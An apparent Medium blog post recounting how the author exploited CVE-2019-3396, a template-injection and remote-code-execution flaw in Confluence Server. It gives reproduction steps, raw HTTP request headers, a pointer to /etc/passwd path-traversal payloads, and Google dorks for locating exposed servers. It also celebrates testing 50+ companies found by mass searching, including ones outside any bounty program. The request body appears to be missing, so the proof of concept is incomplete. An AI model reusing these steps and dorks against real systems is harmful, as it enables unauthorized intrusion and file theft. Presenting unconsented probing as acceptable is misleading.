How I hacked 50+ Companies in 6 hrs

Vignesh C
Vignesh C
Oct 29, 2019 · 4 min read

Long story short, I have created my Hackerone/Bugcrowd profiles a way back in 2016 but I have never reported a bug there. I have never thought of doing a bug hunting but this vulnerability has made me do it.

What was the issue?

SSTI and RCE in Confluence Server via Widget Connector [CVE-2019–3396] — An attacker will be able to exploit this issue to achieve path traversal and remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. Confluence Security Advisory Released — 2019–04–17

How does the Widget Connector go vulnerable?

Widget Connector macro will help you to embed online videos, slideshows, photostreams and more directly into your page when you provide an URL.

This macro was designed to support content from these sites:

  • YouTube, Vimeo, MySpace Video, Flickr, Twitter, Slide Rocket, Google Calendar, etc.

Example Vulnerable Code:

The Widget Connector has defined some renders, for example, FriendFeedRenderer:

public class FriendFeedRenderer implements WidgetRenderer{...public String getEmbeddedHtml(String url, Map<String, String> params) {params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");return this.velocityRenderService.render(getEmbedUrl(url), params);}}

So in this case, an attacker can provide _template values which the backend will use the params to render

Steps To Reproduce:

I swear this would be the simplest PoC you can ever dream of.

  1. Capture the vulnerable confluence page request in burp (let it be a GET or POST) and send it to Repeater.

2. Now modify your captured request as shown below and parse the request.

Note: You may need to change the path of your request and add “Referer:” header, as it is mandatorily expected in most of the cases when I tested, If you did not include that it may throw you an error “XSRF check failed

POST /rest/tinymce/1/macro/preview HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en-GB;q=0.8,ach;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Upgrade-Insecure-Requests: 1
Content-Length: 163
Connection: close

Instead of ../web.xml, you can tryfile:///etc/passwd (path traversal payloads) or Remote Code Execution to increase the severity of your finding.


In fixed versions, it will call doSanitizeParameters before render html which will remove the _template in parameters.

Now What?

Yes, you are right! I got an idea, why don’t I Google Dork!

  1. I tried thisintitle:dashboard-confluence” and was able to find ~100 confluence links out of which 21 was found vulnerable.
  2. On seeing the above dork results, I realized that the confluence link may not necessarily be
  3. So I tried, below dorks/keywords in Google, which gave me around 300+ confluence links out of which 50+ companies were found vulnerable to this.

inurl:http://confluence. login.action

inurl:https://wiki. .com/confluence/

allinurl: /confluence/login.action?





I haven’t targeted any of the bounty programs sites but yet, I received a lot of “Recognition” from various companies as bounty in dollars and Euros, other companies said that they will send me swags as a token of appreciation.

A day I could remember for a very long time, HAPPY HACKING !!!

Smash your claps if you do like this post.

Follow me on twitter for more updates — @pwn_r00t


Vault Infosec

we vow your security

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store